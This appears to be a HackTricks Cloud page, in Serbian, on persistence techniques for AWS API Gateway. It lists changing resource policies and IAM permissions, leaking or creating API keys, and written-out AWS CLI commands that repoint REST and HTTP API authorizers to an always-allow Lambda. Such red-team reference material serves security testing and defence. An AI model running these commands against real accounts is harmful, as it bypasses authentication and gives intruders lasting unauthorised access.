AWS - API Gateway Persistence

Tip

Nauči & vežbaj AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Nauči & vežbaj GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Nauči & vežbaj Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

• Pogledajte subscription plans!
• Pridružite se 💬 Discord group or the telegram group or pratite nas na Twitter 🐦 @hacktricks_live.
• Podelite hacking tricks slanjem PR-ova na HackTricks i HackTricks Cloud github repos.

API Gateway

Za više informacija pogledajte:

AWS - API Gateway Enum

Politika resursa

Izmenite resource policy API gateway(s) kako biste sebi odobrili pristup njima

Izmenite Lambda Authorizers

Izmenite kod lambda authorizers da biste sebi obezbedili pristup svim endpoints.
Ili jednostavno uklonite upotrebu authorizera.

Ako imate control-plane dozvole za kreirati/azurirati authorizera (REST API: aws apigateway update-authorizer, HTTP API: aws apigatewayv2 update-authorizer) možete takođe preusmeriti authorizera na Lambda koja uvek dozvoljava.

REST APIs (promene obično zahtevaju deployment):

REGION="us-east-1"
REST_API_ID="<rest_api_id>"
AUTHORIZER_ID="<authorizer_id>"
LAMBDA_ARN="arn:aws:lambda:$REGION:<account_id>:function:<always_allow_authorizer>"
AUTHORIZER_URI="arn:aws:apigateway:$REGION:lambda:path/2015-03-31/functions/$LAMBDA_ARN/invocations"

aws apigateway update-authorizer --region "$REGION" --rest-api-id "$REST_API_ID" --authorizer-id "$AUTHORIZER_ID" --authorizer-uri "$AUTHORIZER_URI"
aws apigateway create-deployment --region "$REGION" --rest-api-id "$REST_API_ID" --stage-name "<stage>"

HTTP API-jevi / apigatewayv2 (često stupa na snagu odmah):

REGION="us-east-1"
API_ID="<http_api_id>"
AUTHORIZER_ID="<authorizer_id>"
LAMBDA_ARN="arn:aws:lambda:$REGION:<account_id>:function:<always_allow_authorizer>"
AUTHORIZER_URI="arn:aws:apigateway:$REGION:lambda:path/2015-03-31/functions/$LAMBDA_ARN/invocations"

aws apigatewayv2 update-authorizer --region "$REGION" --api-id "$API_ID" --authorizer-id "$AUTHORIZER_ID" --authorizer-uri "$AUTHORIZER_URI"

IAM Permissions

Ako resurs koristi IAM authorizer, možete sebi dati pristup tom resursu menjajući IAM permissions.
Ili jednostavno uklonite korišćenje authorizer-a.

API Keys

Ako se koriste API keys, možete napraviti leak tih ključeva da biste održali persistence ili čak kreirali nove.
Ili jednostavno uklonite upotrebu API keys.

Tip

Nauči & vežbaj AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Nauči & vežbaj GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Nauči & vežbaj Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

• Pogledajte subscription plans!
• Pridružite se 💬 Discord group or the telegram group or pratite nas na Twitter 🐦 @hacktricks_live.
• Podelite hacking tricks slanjem PR-ova na HackTricks i HackTricks Cloud github repos.